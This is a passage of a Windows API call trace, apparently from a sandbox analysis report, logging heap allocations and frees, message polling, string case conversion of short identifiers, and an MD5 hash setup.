lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0267.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0267.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0267.964] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.964] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0267.964] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.964] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.965] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.965] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0267.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0267.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.965] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0267.965] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0267.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0267.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0267.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0267.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.966] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0267.966] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0267.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0267.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0267.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0267.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0267.967] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.967] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.968] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.968] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0267.968] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.968] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0267.968] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.968] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.968] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.968] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.968] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.968] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.968] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.968] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.968] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.969] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.969] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.969] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.969] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.969] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.969] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.969] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.969] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.969] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.969] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.969] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.969] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.969] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.969] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.970] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.970] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.970] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.970] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.970] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.970] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.970] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.970] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.970] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.970] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.970] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.970] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.970] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.971] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0267.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0267.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0267.971] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0267.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0267.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0267.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0267.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0267.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0267.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0267.971] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0267.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0267.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0267.972] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.972] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0267.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0267.972] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0267.973] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0267.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.974] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.974] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.974] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.974] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0267.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0267.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0267.975] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.975] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.975] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0267.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0267.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0267.975] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0267.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0267.975] CryptHashData (hHash=0xaa5860, pbData=0x24b17e8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0267.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.976] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 